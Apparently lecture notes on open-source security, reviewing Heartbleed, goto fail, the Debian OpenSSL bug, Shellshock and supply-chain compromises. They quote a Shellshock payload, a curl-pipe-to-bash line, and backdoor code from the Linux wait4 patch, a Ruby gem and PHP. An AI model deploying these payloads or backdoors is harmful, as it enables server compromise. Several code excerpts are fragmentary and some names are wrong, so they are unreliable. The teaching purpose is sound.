Open-Source Security

Is open source more secure because more people look at the code? Or less secure, because bad guys can look at the code and find bugs?

This question has been debated for quite some time. For a while, so-called "fuzzing" techniques (for generating random input) did work better when the source was available: the user would examine the source and generate input until all the edge cases were triggered. The goal was to execute every part of the code.

But then that changed: tools were developed that could do this given only the object code. At that point, having the source was no longer a liability. A large number of Windows exploits started to appear.

On the other hand, the truth is that not everybody looks at the code. In most cases, not very many do.

TLS, for Transport Layer Security, is an encryption layer used above TCP (or UDP). It is what creates the 's' in https, for secure http.

Three issues

First, the software can have bugs. Perhaps this is more likely for Open Source because of fewer development resources, though that is hard to say.

Second, repositories can be compromised. This, too, can happen with commercial software, but Open Source does seem to be at least a little more prone to this.

Finally, it is easy for users to fall behind on upgrading. If you're installing an e-commerce package from Microsoft, then Microsoft will make sure it gets updated. However, if you're building your own e-commerce package from a dozen separate open-source projects, then it's your job to update them all. It's easy to forget.

These issues completely ignore the question of how many users actually look at the code in their open-source packages, or whether it's easier to figure out vulns once you hear vaguely of a problem with a certain project.

It remains true that Open Source projects are easier to trust. Even software from Microsoft is often tracking you or selling you something.

Debian OpenSSL bug

At some point (probably 2006), Debian removed a couple lines from the Debian copy of OpenSSL because the lines generated complaints from code-analysis software. Here's the code as of today, from; the function is static void ssleay_rand_add(const void *buf, int num, double add). The variable m is a pointer to a certain structure. The call to MD_Update() itself is actually a macro:

#define MD_Update(a,b,c)	EVP_DigestUpdate(a,b,c)

The variable m is a pointer to a certain structure. Here is part of the code:

	for (i=0; i<num; i+=MD_DIGEST_LENGTH)

		if (k > 0)

		/* We know that line may cause programs such as
		   purify and valgrind to complain about use of
		   uninitialized data.  The problem is not, it's
		   with the caller.  Removing that line will make
		   sure you get really bad randomness and thereby
		   other problems such as very insecure keys. */

MD_Update(&m,(unsigned char *)&(md_c[0]),sizeof(md_c)); MD_Final(&m,local_md); md_c[1]++; buf=(const char *)buf + j; for (k=0; k<j; k++) { /* Parallel threads may interfere with this, * but always each byte of the new state is * the XOR of some previous value of its * and local_md (itermediate values may be lost). * Alway using locking could hurt performance more * than necessary given that conflicts occur only * when the total seeding is longer than the random * state. */ state[st_idx++]^=local_md[k]; if (st_idx >= STATE_SIZE) st_idx=0; } }  

The code-analysis software thought the repeated calls (this is inside a loop) to MD_Update(&m,buf,j) made use of uninitialized data. This may actually have been the case, in that perhaps some entropy was indeed supposed to come from the uninitialized data. The code does look odd, though, from a deterministic point of view. Still, the point of the repeated calls to MD_Update() was to generate additional randomness.

Commenting out the call to MD_Update(&m,buf,j) greatly reduced the total available entropy. Supposedly the entropy now came from a single 16-bit number. This really breaks the random-number generator.

Debian discovered and fixed the error in 2008.

Apple TLS bug

Here is the source code (Apple has open-sourced a lot of OS X, but not the GUI parts of it):

static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
	OSStatus        err;

	if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
		goto fail;
	if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
		goto fail;
		goto fail;
	if ((err =, &hashOut)) != 0)
		goto fail;

err = sslRawVerify();

fail: SSLFreeBuffer(&signedHashes); SSLFreeBuffer(&hashCtx); return err; }

Note the duplicated "goto fail". Note the lack of enclosing {}. Despite the appearances of the indentation, the second goto fail is thus always executed. The call to SSLVerifySignedServerKeyExchange() always jumps to fail. But most likely we still have err==0 at this point (because none of the err != 0 checks actually succeeded), and so the connection is verified even if there was a certificate mismatch.

It's times like this that it is really handy to have the compiler doing dead-code detection. Fail.

Ok, nobody was looking at the Apple source here outside of Apple.

OpenTLS bug

As the Debian and Apple issues above show, anyone can introduce TLS bugs. But the "heartbleed" bug was clearly related to the relatively modest development resources available to the OpenSSL foundation.

Most servers used OpenSSL, officially OpenTLS. TLS contains a heartbeat provision: the client sends occasional "heartbeat request" packets and the server is supposed to echo them back, exactly as is. This keeps the connection from timing out. That is, the client sends a (len,data) pair, and the server is supposed to echo back that much data. Part of the reason for echoing back data is so the client can figure out which request triggered a given response. It might make the most sense for the client request data to represent consecutive integers: "0", "1", ..., "10", "11", "12", ....

The problem is that the client can lie: the client can send a request in which len ≠ data.length. If len < data.length, this is harmless; just the first len bytes of data get sent back. But what happens if len > data.length, and the server sends back len bytes? In this case the server would try to send too much back. In a sensible language, this would result in an array-bounds exception for data. In C, however, the result is the grabbing of a random chunk of memory beyond data. Suppose a sneaky client sent, say, a 3-byte payload, but declared the payload length (the value of len) as, say, 1000 bytes. The server now sends back 997 bytes of general heap memory, which may contain interesting content. Unpredictable, but interesting.

xkcd diagram of heartbleed exploit

Here is the original code, from tls1_process_heartbeat(SSL * s). The variable payload represents the length of the heartbeat payload.

n2s(p, payload);	// extract value of payload (the length)
pl = p;
if (hbtype == TLS1_HB_REQUEST) { unsigned char *buffer, *bp; int r; /* Allocate memory for the response, size is 1 bytes * message type, plus 2 bytes payload length, plus * payload, plus padding */ buffer = OPENSSL_malloc(1 + 2 + payload + padding); bp = buffer; /* Enter response type, length and copy payload */ *bp++ = TLS1_HB_RESPONSE; s2n(payload, bp); memcpy(bp, pl, payload); // pld: copy payload bytes from pointer pl to pointer bp (=buffer, above) bp += payload; /* Random padding */ RAND_pseudo_bytes(bp, padding); r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding); if (r >= 0 && s->msg_callback) // pld: this will get moved s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding, s, s->msg_callback_arg); OPENSSL_free(buffer); if (r < 0) return r; }

There is no check here that the value of payload, the declared length of the payload, matches the actual length of the payload.

Here is the fix:

if (hbtype == TLS1_HB_REQUEST) 
	unsigned char *buffer, *bp;
	int r;
	/* Allocate memory for the response, size is 1 bytes
	 * message type, plus 2 bytes payload length, plus
	 * payload, plus padding
	buffer = OPENSSL_malloc(1 + 2 + payload + padding);
	bp = buffer;

	/* Enter response type, length and copy payload */
	*bp++ = TLS1_HB_RESPONSE;
	s2n(payload, bp);

if (r >= 0 && s->msg_callback) // this got moved, so it always executes even if one of the returns below is made s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding, s, s->msg_callback_arg);

if (1+2+16 > s->s3->rrec.length) // check if actual payload length > 0!
return 0;

memcpy(bp, pl, payload); // copy payload bytes from pointer pl to pointer bp (=buffer, above)

if (1+2+payload+16 > s->s3->rrec.length) // check if actual payload length is longer than declared length return 0; // RFC 6520 section 4 says to silently discard

bp += payload; /* Random padding */ RAND_pseudo_bytes(bp, padding); r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding); OPENSSL_free(buffer); if (r < 0) return r; }

Google reported the bug to the OpenSSL Foundation on April 1, 2014. It is estimated that somewhere between 15 and 60% of sites using SSL were affected.

The bug is now fixed. Nobody knows how much it was exploited.

The more interesting question might be why OpenSSL didn't get more attention before. There were people outside the OpenTLS Foundation looking at the code, but none of them noticed Heartbleed.

Ultimately, the problem was that OpenTLS was severely underfunded. The president of the OpenSSL foundation is (or was, in 2014; he's since left) Steve Marquess. In a blog post after Heartbleed, he described himself as the fundraiser. The OpenSSL foundation received $2,000/year in donations, and also did some support consulting (the latter earned a lot more).

In the week after Heartbleed, the OpenSSL foundation received $9,000, mostly in small donations from individuals. Not from the big corporate users of OpenSSL.

The foundation has one paid employee, Stephen Henson, who has a PhD in graph theory. He is not paid a lot. Before Steve M created the OpenSSL foundation, Steve H's income has been estimated at $20K/year. (The heartbleed error was not his.)

Despite the low level of funding, though, in the eight (or more) years before Heartbleed the OpenSSL Foundation was actively seeking certification under the NIST Cryptographic Module Validation Program. They understood completely that cryptography needs outsider audits.

As of 2014, at least, the two Steves had never met face-to-face. Like Steve M, Steve Henson moved on to other projects in 2017.

A month after the bug's announcement, the Linux Foundation announced that it was setting up the Core Infrastructure Initiative. They lined up backing from Google, IBM, Facebook, Intel, Amazon and Microsoft. The first project on the agenda was OpenSSL, and its struggle to gain certification from the US government.

In 2015 a formal audit of OpenSSL was funded, by the Open Crypto Audit Project, That audit has now been completed; a 2016 status report is at

Here is a report of a later audit:

As of 2016, Black Duck reported that 10% of the applications they tested were still vulnerable to Heartbleed, 1.5 years after the revelation (

See also the Buzzfeed article "The internet is being protected by two guys named Steve".

More Open-Source Security Issues


Magento is an e-commerce platform owned by Adobe. It is described as having an "open-source ecosystem". It is available on github at I assume that is the "community edition"; there is also an "enterprise edition".

A vulnerability was announced in April 2017 by DefenseCode LLC, six months after it was reported privately to Magento. Magento did not respond directly to DefenseCode. The vulnerability "could" lead to remote code execution, though there are some additional steps to get that to work, and it was not clear whether that actually happened in the wild. See

If a site adds a link to a product video stored remotely on Vimeo, the software automatically requests a preview image. If the file requested is not in fact an image file, Magento will log a warning message, but it will still download the file. The idea is to trick Magento into downloading an executable file, eg a .php file. An updated .htaccess file also needs to be downloaded, but once the basic file-download idea is working this is not difficult. Because of the way files are stored, the .php file should begin with ".h", so the .htaccess file ends up in the same directory.

Parts of the strategy also involve cross-site request forgeries (CSRF) against someone with Magento management privileges at the target site. Even low-level privileges are sufficient. There are numerous strategies for trying to get someone to click on a suitable link; none of them are sure bets.

Magento's failure to respond more aggressively to DefenseCode was puzzling. This seems less likely in a "true" open-source project.

As of 2018, Magento was still running into security issues, often related to brute-force attacks on administrative passwords, which were often not well-configured. Magento is an attractive target, as it is an e-commerce front-end, and as a result a large number of credit-card transactions flow through it.

Also in 2018, open-source security firm Black Duck sold for half a billion.


In August 2017 credit-reporting company Equifax discovered that personal records on 140 million US people had been exfiltrated. The actual vulnerability was in Apache Struts 2, which is  a framework for developing Java server-side web applications. It extends the Java Servlet API. Struts has a history of serious vulnerabilities. The vulnerability in question was CVE-2017-5638, which allows for remote code execution.

Equifax was notified of the issue in March 2017. They looked, but could not find a place on their site where Struts was being used! The vulnerability went unpatched, even as it was being routinely exploited in the wild.

Making sure tools and frameworks are updated is tedious work. Something like Struts can be buried in the archives of a project that was largely completed years ago. Still, Equifax's negligence is hard to understand.


This is the bug that was in bash that allowed very easy remote code execution. It was discovered and fixed in 2014. The problem is that the act of setting an environment variable -- normally benign -- could be tricked so as to execute a shell script as well, if the environment variable began with a shell function definition.

The shell maintains the environment as a list of (name,value) pairs. Specifically, we can assign an environment variable as follows:


echo $FOO

We can also assign shell functions, eg with

FN() { echo hello;}

(the space before "echo" is significant). Prior to Shellshock, this would be stored in the environment as the pair (FN, "() { echo hello;}").(You can list bash functions with typeset -F.)

The problem was that one could sneak a command following the function definition, and it would be executed at the time the environment variable was set:

FN() { echo hello;}; echo "hello world!"

(The command is not actually part of the function.) This is due to a mistake in recognizing the end of the function body. The above looks to older versions of bash like the following environment-variable assignment, followed by a command.

FN='{ echo hello;}; echo "hello world!"'

Whenever this definition is executed (eg at the time it is made, and whenever the environment is passed to a new process), the 'echo "hello world!"' command would go along for the ride. The core problem here is with shell variables that begin with '()'; normal shell-variable strings do not result in this problem. That is, assigning a variable FN2='echo "hello world"' would not result in command execution; nor would FN3="foo"; echo "hello world" (though when done for the first time the FN3 example would echo "hello world" once).

This is most of the problem. The other part is that web servers, and quite a range of other software, routinely accept strings from clients that they then turn into environment variables. For example, if the client sends the following GET request to the server (from

GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

then the server turns it into the following environment settings (before executing the GET request):

HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

The server does this so that a cgi script on the server will have access to these values, through its environment. However, because of the bug, setting environment variables can lead to code execution!

Now, if the client instead sent the following text as User-Agent (there is no actual "string" here, in fact):

User-Agent: () { :; }; /bin/eject

Then the command /bin/eject would be executed on the server. (As for the shell function, ":" is the bash null command; the legal function part is () { :; };.

A consequence of the patch is that bash functions are no longer stored in the environment at all. (This wouldn't strictly have been necessary, but it probably was a good idea.)

Meltdown and Spectre

The Meltdown and Spectre vulnerabilities affect Intel CPUs; Intel open-sources nothing about its processors. But open-source operating systems still had to create patches.

The problem is that open-source patches had to be created while there was still a news embargo on the details of the vulnerability, lest miscreants get a leg up on exploiting them.

Meltdown and Spectre were discovered in the summer of 2017 by Jann Horn of Google, Werner Haas and Thomas Prescher from Cyberus Technology, and Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz from Cyberus Technology. The discoverers informed Intel, and all agreed to announce the flaw only once there was a fix in place.

In November 2017, Alex Ionescu noticed an upgrade to Windows 10 that made the CPU run slower, with no obvious benefit. He suspected this was a vulnerability patch.

On Wednesday January 3, there were new commits to the Linux kernel. Observers quickly noticed that the commits didn't seem to make sense, from a performance perspective. Rampant speculation that they were related to a hardware vulnerability led to the announcement of Spectre and Meltdown on that date. The scheduled release/announcement date was to be January 9, Microsoft's "Patch Tuesday".

Still, the Linux community by and large did abide by the embargo rules. This is complicated, because it means not using the public discussion system that has been put in place. It also means not releasing important security fixes until the embargo is ended.

The head of OpenBSD, Theo de Raadt was extremely vexed, as OpenBSD was not given advanced warning:

Only Tier-1 companies received advance information, and that is not responsible disclosure – it is selective disclosure.... Everyone below Tier-1 has just gotten screwed.

De Raadt also argued that, while Spectre might be considered an unforeseen bug, the issues behind Meltdown were long understood to at least some degree. Intel decided to go ahead with their speculative-execution design anyway, in order to beat the competition.

OpenBSD did announce a fix before the end of the embargo for the Wi-Fi Krack vulnerability of October 2017. The theory at that time was that OpenBSD would therefore not be given advance warning of the next vulnerability. But several other smaller OS vendors (Joyent, SmartOS) also were not told about Meltdown/Spectre in advance.

Still, there is a real problem: to abide by embargo rules means sitting on a fix, knowing your users might be being attacked. It means your source is, until the embargo ends, no longer "open".

Windows Security

Windows systems are quite hard to secure, partly because there are so many files that are not well-understood within the security community, and partly because of the registry.

Licensing rules don't help. If you want to verify the SHA-3 checksum of every file, for example, you pretty much have to boot off a clean bootfile. Otherwise, malware that has made it into the kernel can make it seem that all files are unchanged. However, in Windows, a separate boot device technically requires a separate license. And in practice making a bootable Windows USB drive is not easy, without paying for a separate license.

Cryptography Software

It is certainly reasonable to think of commercial software as reliable. After all, one can read the reviews, and a company couldn't stay in business if it didn't keep its users happy. If the software doesn't work properly, won't users know?

If the software is a word processor, and it keeps crashing, or failing to format text properly, the failure is obvious. If the software does complex engineering calculations, that's harder to detect, but usually users do at least a little testing of their own.

But if closed-source software does encryption, it is almost impossible to verify that it was done correctly. Just what random-number algorithm was used? Was the AES encryption done properly? (If it was not, then the problem becomes very clear if the software is sending encrypted content to an independent decryption program, but this is often not the case. Lots of times, the same program is used to encrypt files and then later to decrypt them, in which case an algorithm with a security flaw is almost undetectable.) Was the encryption done first, followed by the authentication hash (HMAC), or was it the other way around? Doing it the first way is much safer, as the HMAC then provides no information about whether brute-force decryption is on the right track.

For reasons like this, some commercial encryption software is audited. But usually it is not. The bottom line is that commercial crypto is hard to trust.

Sometimes open-source isn't audited either. But it's hard to find out. And even with OpenSSL, people outside the OpenSSL foundation were looking at the basics of encryption, to make sure it looked ok.

Software Trust

Whatever one can say about open-source reliability (which, in general, is comparable to commercial-software reliability), open source wins the trust issue hands down. Once upon a time, most software was trustworthy, in that you could be reasonably sure the software was not spying on you. Those days are gone. Most Android apps spy, to some degree or another, on the user. Microsoft Office appears not to, but Windows 10 sends quite a bit of information back to Microsoft (some of this can be disabled through careful configuration).

Spyware is almost unknown, however, in the open-source world. Ubuntu has a search feature, that returns some information to Canonical, but that's reasonably up-front. Firefox often asks to send crash reports, but, again, that's open. The reasons open-source spyware is so rare are:

Ironically, "free" software that is not open-source is usually spyware: "if you're not paying for the product, you are the product". Most non-open-source browser add-ons, in particular, are spyware. Many Android apps are spyware; flashlight apps are notorious.

Open-source trust is not always quite straightforward. Firefox, for example, is the browser with the most privacy-protection features, hands down. A version of Firefox is the basis for the Tor browser. That said, many Firefox privacy features are disabled by default, because some commercial sources of Firefox funding have had concerns.

SourceForge (and Gimp)

SourceForge is a popular alternative to GitHub for open-source projects. GitHub makes money selling space for non-public projects (public projects are free). SourceForge sold banner advertisements, and in 2013 started a "bundleware" program in which a user who downloaded a program or source tree would optionally receive a second download. The second download was selected by default, though users could unselect it. SourceForge is often used to distribute binaries, so this bundleware issue was not easily avoided once the download started.

The problem was that the second downloaded package, a paid installation, often involved malware. At a minimum, spyware was common. Another common feature was advertisements that were allowed to contain a large DOWNLOAD button.

The Gimp project left SourceForge in 2013, but as of 2015 SourceForge was still distributing Gimp binaries (as an "abandoned" project), and bundling them with malware. This did not go over well with the Gimp team.

How can an open-source project protect itself against malicious distribution? What happens when a project is completely abandoned? What happens when a project simply moves elsewhere?

In 2016 the bundleware program was ended, as new owners took control.

Generally speaking, the actual open-source repositories weren't usually tampered with, though the Gimp case might be an exception.

Tampered or Trojaned Repositories

These are also sometimes called software "supply chain" attacks.

In 2003, the main Linux repository was still on BitKeeper, but they maintained separate mirror repository running CVS. One day a patch appeared in the CVS image in the code for the wait4() call:

+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;

That last '=' on the first line is an assignment, not a comparison. Setting uid to 0 gives the process root privileges. Inside a syscall, that is legal.

This patch never made it back to the main BitKeeper repo, and it was pretty obvious from the beginning as it was the only file on the CVS mirror that didn't have a link back to BitKeeper, but nobody knows how it got there. See

There was a break-in at in 2011. It is not certain that no kernel files were briefly modified, though the rigorous checksumming process would have made that difficult.. Donald Austin was arrested for the breach, in Florida, in 2016.

In 2012, a SourceForge mirror site was hacked, and the phpMyAdmin package was modified to contain malware.

In June 2018, hackers took over a Gentoo mirror account on github and installed file-deleting malware. Gentoo suffered at least one earlier such attack, in 2010.

In July 2018, three packages on the Arch User Repository were infected with malware, including acroread (Adobe Acrobat Reader). Acroread isn't open-source, but it's trivial to install a one-line attack in the installation script:   

   curl -s | bash &

The AUR is not the same as the Arch distribution itself, but distinctions like this are sometimes hard to keep track of.

In an Aug 7, 2018 blog post, Eric Holmes describes how he gained commit access to Homebrew using credentials he found on the site. See Homebrew is a package manager for macs, though it also works well under Linux.


There was also a 2018 attack to Webmin, a system-administration tool, in which password_change.cgi was modified. See for details. The attack affected the code on the build server, but apparently not the Github repository. Still, the vulnerable code was widely distributed. Most users, for example, installed the Debian or RPM pre-compiled package.

Ruby strong_password gem

In June 2019 the Ruby strong_password gem (Ruby's name for library), version 0.0.7, was hijacked.


Here's the crucial code: {
    loop {
        sleep rand * 3333;
  } if Rails.env[0] == "p"


This happened in March 2019 with a different Ruby package:

In both cases, the source was unchanged; the distribution at was what was compromised.

There were multiple related vulnerabilities discovered in August 2019:

There's also the VestaCP admin interface, and a python package Colourama.

Consider building from source for production versions!


A vulnerability in the open-source file-compression utility decompress was discovered in 2020. The problem is that, while decompressing, it could overwrite files such as ../../../etc/passwd (or, for that matter, ./foo/bar/../../../../../etc/passwd). This is a very old idea, but it keeps coming up. It is surprisingly hard to validate legitimate relative paths.


YAML is a data-serialization format, not unlike JSON. PyYAML unpacks YAML data. Alas, it could be tricked, in a bug discovered in 2020, into running arbitrary constructors (and thus arbitrary code) when deserializing data. (The pickle library, the standard Python serialization mechanism, had the same issue a few years earlier.)


This is a javascript library that supports a range of common utility functions. It is used in over ~4 million projects on Github alone. A vuln discovered in 2019 involved "prototype pollution", eg modification of Object-level standard methods through introduction of new child classes.


The Octopus scanner was malware on Github that tried to infect other repositories, through the use of a Netbeans issue. It was discovered in Spring 2020. Once a Netbeans installation was infected, every .jar file built with that installation would also carry the infection. See


In March 2021 it was discovered that an update to PHP contained a backdoor. If a website used the compromised PHP, someone could execute arbitrary code through the use of the password "zerodium". The PHP code was on a private git server It looks like the server itself was compromised; the malicious code appeared to have been uploaded by two trusted PHP maintainers (who were not in fact involved).

There is in fact a security company named Zerodium, but they were not related.

The added code looked something like this (

if (strstr(Z_STRVAL_P(enc), "zerodium")) {
    zend_try {
Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

The idea was that if your User-Agent HTTP header string began with "zerodium", then the rest of the string would be executed. That "REMOVETHIS" string is just what gets inserted in the logfiles.

Thompson Backdoor

Ken Thompson is one of the original developers of Unix. In his 1983 Turing Award speech, "Reflections on Trusting Trust", he described the following hack:

There was one more step: when the compiler was asked to disassemble the Trojaned code, it would show what the code was supposed to be, not what it actually was.

Thompson did implement this as a demo. Nobody really thinks anyone is trying this today.